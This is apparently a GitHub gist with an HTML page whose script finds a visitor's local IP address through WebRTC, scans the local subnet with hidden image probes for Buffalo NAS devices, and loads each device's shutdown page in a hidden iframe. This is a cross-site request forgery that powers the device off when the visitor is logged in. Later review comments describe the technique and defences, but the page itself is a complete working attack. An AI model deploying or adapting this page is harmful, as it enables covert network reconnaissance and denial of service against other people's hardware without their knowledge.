
@venoms
Created January 24, 2016 03:31
Scans for, and shuts down, Buffalo NAS devices on the local network
<head>
<title>buffalo nas shutdown</title>
</head>
<body>
<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
<div id="output"></div>
<script>
// Log area for the page. Every status line in this script is appended through
// innerText, so the addresses it prints are rendered as text, not parsed as markup.
var output = document.getElementById("output");
//stolen from https://github.com/diafygi/webrtc-ips
//under the MIT license
//get the IP addresses associated with an account
/**
 * Collect the addresses that appear in this browser's WebRTC ICE candidates
 * and hand each distinct one to `callback`.
 *
 * A peer connection with one throwaway data channel is opened against a STUN
 * server; candidate strings arrive through onicecandidate and are also re-read
 * from the local SDP after a fixed one-second delay. Nothing in this function
 * asks the user for anything, which is why this pattern is treated as an
 * address leak from the visitor's point of view.
 *
 * NOTE(review): only literal IPv4 / full-form IPv6 addresses are recognised.
 * Browsers that publish host candidates as mDNS names rather than literal
 * addresses give ip_regex nothing to match - presumably the reason this
 * technique is unreliable on current browsers; confirm per browser version.
 * The createOffer / setLocalDescription calls use the legacy callback form.
 *
 * @param {function(string): void} callback - invoked once per distinct address.
 */
function getIPs(callback){
// addresses already reported, used as a set (key = address string)
var ip_dups = {};
//compatibility for firefox and chrome
var RTCPeerConnection = window.RTCPeerConnection
|| window.mozRTCPeerConnection
|| window.webkitRTCPeerConnection;
// useWebKit is assigned here and in the fallback below but never read in this function
var useWebKit = !!window.webkitRTCPeerConnection;
//bypass naive webrtc blocking using an iframe
if(!RTCPeerConnection){
//NOTE: you need to have an iframe in the page right above the script tag
//
//<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
//<script>...getIPs called in here...
//
// `iframe` is not declared in this script; it resolves to the element with
// id="iframe" through named access on the window object.
var win = iframe.contentWindow;
RTCPeerConnection = win.RTCPeerConnection
|| win.mozRTCPeerConnection
|| win.webkitRTCPeerConnection;
useWebKit = !!win.webkitRTCPeerConnection;
}
//minimal requirements for data connection
var mediaConstraints = {
optional: [{RtpDataChannels: true}]
};
var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
//construct a new RTCPeerConnection
var pc = new RTCPeerConnection(servers, mediaConstraints);
// Extract the address from one candidate string and report it if it is new.
function handleCandidate(candidate){
//match just the IP address
var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/
// exec() returns null when the string holds no literal address; the result is
// indexed without a check, so such a candidate throws here.
var ip_addr = ip_regex.exec(candidate)[1];
//remove duplicates
if(ip_dups[ip_addr] === undefined)
callback(ip_addr);
ip_dups[ip_addr] = true;
}
//listen for candidate events
pc.onicecandidate = function(ice){
//skip non-candidate events
if(ice.candidate)
handleCandidate(ice.candidate.candidate);
};
//create a bogus data channel
pc.createDataChannel("");
//create an offer sdp
pc.createOffer(function(result){
//trigger the stun server request
// both completion callbacks are empty: success and failure are ignored
pc.setLocalDescription(result, function(){}, function(){});
}, function(){});
//wait for a while to let everything done
// fixed 1000 ms delay; the code does not wait for any gathering-complete signal
setTimeout(function(){
//read candidate info from local description
var lines = pc.localDescription.sdp.split('\n');
lines.forEach(function(line){
if(line.indexOf('a=candidate:') === 0)
handleCandidate(line);
});
}, 1000);
}
/**
 * Report a detected device and load its shutdown page in a hidden iframe.
 *
 * The request is a plain cross-site GET to http://<ip>/shutdown.html issued by
 * the visitor's own browser. According to the status message written below, it
 * only has an effect when that browser is already logged in to the device, so
 * it rides on the existing session (cross-site request forgery).
 *
 * Defensive reading: an endpoint that changes device state should not act on a
 * GET and should require an anti-CSRF token or an Origin check.
 * NOTE(review): how the device actually handles this request is not visible here.
 *
 * @param {string} ip - address of the host whose logo image loaded.
 */
function foundNAS(ip) {
  var shutdownUrl = "http://" + ip + "/shutdown.html";
  output.innerText += "Bingo! NAS at " + ip + "\n";
  var hiddenFrame = document.createElement("iframe");
  // attributes are applied in the same order as before: style first, then src
  [["style", "display:none"], ["src", shutdownUrl]].forEach(function(pair){
    hiddenFrame.setAttribute(pair[0], pair[1]);
  });
  output.innerText += "Shutting it down now... This will fail if you're not logged in.";
  // the navigation starts once the frame is attached to the document
  document.body.appendChild(hiddenFrame);
}
// Driver: for every private or link-local address reported by getIPs, probe the
// hosts that share its first three octets for one fixed image path and pass
// each host that serves it to foundNAS.
//
// What a defender should take from this block:
//  - A cross-origin <img> exposes load vs. error to the embedding page, so any
//    web page can learn whether a LAN host serves a known static file. No
//    response body is read; the event alone is the signal.
//  - On the wire this is a burst of HTTP GETs for the same image path to
//    consecutive addresses from one client, groupSize at a time.
//  - Device-side fixes belong on the state-changing endpoint (see foundNAS);
//    browser-side, controls that restrict public pages from requesting private
//    addresses (e.g. Private Network Access, where enforced) address the probe.
// number of image probes issued per batch
var groupSize = 50;
//Using STUN, we locate the local ip address of the user
// we make sensible guesses that the NAS is in the same simple local network
getIPs(function(ip){
//local IPs
// matches 192.168.x.x, 169.254.x.x, 10.x.x.x and 172.16-31.x.x; other addresses are ignored
if (ip.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01]))/)) {
output.innerText += "Found IP " + ip + "\n"
// shotgun this ip
// pre = the address minus its final number, e.g. "a.b.c."
var pre = /^([\d\.]+\.)\d+$/.exec(ip)[1];
output.innerText += "Searching " + pre + "*\n"
// i = next last-octet value to probe, ed = exclusive end of the current batch;
// both are shared by every sweep() call and every event handler below
var i = 0, ed = 0;
//try a block of 50 NAS guesses
var sweep = function() {
ed = i + groupSize
// completed probes (load or error) in this batch
var donect = 0;
var done = function() {
donect += 1;
// the for loop below finishes before any event fires, so i equals ed here;
// no further batch is scheduled once it has passed 253
if (i > 253) return;
// loose equality; both operands are numbers
if (donect == groupSize) sweep();
console.log(i);
}
output.innerText += "Searching " + pre + i + "-" + ed + "\n"
for(;i<ed;i++) {
var el = document.createElement("img");
// n is assigned but not read anywhere in the visible code
var n = i;
el.setAttribute("style", "width:1em; height:1em;display:inline;border:1px solid red");
// logo loaded; must be NAS
el.addEventListener("load", function(){
done();
this.setAttribute("style", "display:block");
// the address is recovered from the image's own src rather than from i,
// which has already advanced by the time this handler runs
foundNAS(/(?:\d+\.){3}.\d+/g.exec(this.src)[0]);
});
// logo did not load; not NAS
el.addEventListener("error", function() {
done();
this.parentNode.removeChild(this);
});
// assigning src to the attached element is what issues the request
el.setAttribute("src", "http://" + pre + i + "/img/common/forlink/header-logo.gif");
document.body.appendChild(el);
}
}
sweep();
}
});
</script>